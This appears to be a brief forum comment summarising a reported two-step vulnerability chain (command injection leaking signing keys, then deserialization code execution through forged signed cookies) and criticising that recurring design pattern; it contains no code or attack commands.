As far as I can tell there's two vulnerabilities bundled up here. One is an unauthenticated command injection (!) vulnerability to steal some keys and the other is of course yet another serialization-based RCE in a safe language, mediated by signed cookies (signed with the keys stolen in step 1).

I don't understand how often this design has to blow up in people's faces until they stop doing this and use something dumb and safe instead.